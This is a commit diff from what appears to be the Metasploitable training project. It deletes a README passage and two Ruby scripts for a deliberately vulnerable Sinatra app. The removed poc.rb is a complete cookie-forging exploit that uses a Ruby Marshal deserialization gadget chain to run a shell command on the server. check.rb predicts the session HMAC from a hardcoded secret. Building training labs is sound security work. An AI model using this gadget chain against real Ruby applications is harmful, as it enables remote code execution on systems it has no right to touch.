Delete files that are not needed anymore

chef/cookbooks/metasploitable/files/sinatra/README.txt

@@ -9,13 +9,6 @@ Since this is a custom application, the Metasploitable player is required to
 figure out what the secret is (remotely, not through code reading), and write
 an exploit from scratch.
 
-For development purposes, you can use the following scripts to test the
-vulnerable service:
-
-* check.rb - This will check if the application is vulnerable.
-* poc.rb   - This will attempt to exploit the application. It will create a
-             file named /tmp/your_id.txt
-
 ==============
 Usage
 ==============

chef/cookbooks/metasploitable/files/sinatra/check.rb

@@ -1,26 +0,0 @@
-#!/usr/bin/env ruby
-
-#
-# This will check our vulnerable app to see if it's vulnerable or not.
-# It does so by predicting the hash in the cookie.
-#
-
-require 'openssl'
-require 'cgi'
-require 'net/http'
-
-SECRET = "a7aebc287bba0ee4e64f947415a94e5f"
-
-cli = Net::HTTP.new('127.0.0.1', 8181)
-req = Net::HTTP::Get.new('/')
-res = cli.request(req)
-cookie = res['Set-Cookie'].scan(/_metasploitable=(.+); path/).flatten.first || ''
-data, hash = cookie.split('--')
-puts "[*] Found hash: #{hash}"
-puts "[*] Attempting to recreate the same hash with secret: #{SECRET}"
-expected_hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, CGI.unescape(data))
-puts "[*] Predicted hash: #{expected_hash}"
-
-if expected_hash == hash
-  puts "[*] Yay! we can predict the hash. The server is vulnerable."
-end

chef/cookbooks/metasploitable/files/sinatra/poc.rb

@@ -1,34 +0,0 @@
-#!/usr/bin/env ruby
-
-#
-# This PoC will inject Ruby code in our vulnerable app.
-# It will run the system command "id", and save the output in /tmp/your_id.txt
-#
-
-require 'openssl'
-require 'cgi'
-require 'net/http'
-
-SECRET = "a7aebc287bba0ee4e64f947415a94e5f"
-
-module Erubis;class Eruby;end;end
-module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end
-
-erubis = Erubis::Eruby.allocate
-erubis.instance_variable_set :@src, "%x(id > /tmp/your_id.txt); 1"
-proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.allocate
-proxy.instance_variable_set :@instance, erubis
-proxy.instance_variable_set :@method, :result
-proxy.instance_variable_set :@var, "@result"
-
-session = { 'session_id' => '', 'exploit' => proxy }
-
-dump = [ Marshal.dump(session) ].pack('m')
-hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, dump)
-cookie = "_metasploitable=#{CGI.escape("#{dump}--#{hmac}")}"
-
-http = Net::HTTP.new('127.0.0.1', 8181)
-req = Net::HTTP::Get.new('/')
-req['Cookie'] = cookie
-res = http.request(req)
-puts "Done"

chef/cookbooks/metasploitable/recipes/sinatra.rb

@@ -13,7 +13,7 @@ directory '/opt/sinatra' do
   mode '0777'
 end
 
-['Gemfile', 'README.txt', 'check.rb', 'poc.rb', 'start.sh', 'server.rb'].each do |fname|
+['Gemfile', 'README.txt', 'start.sh', 'server.rb'].each do |fname|
   cookbook_file "/opt/sinatra/#{fname}" do
     source "sinatra/#{fname}"
     mode '0777'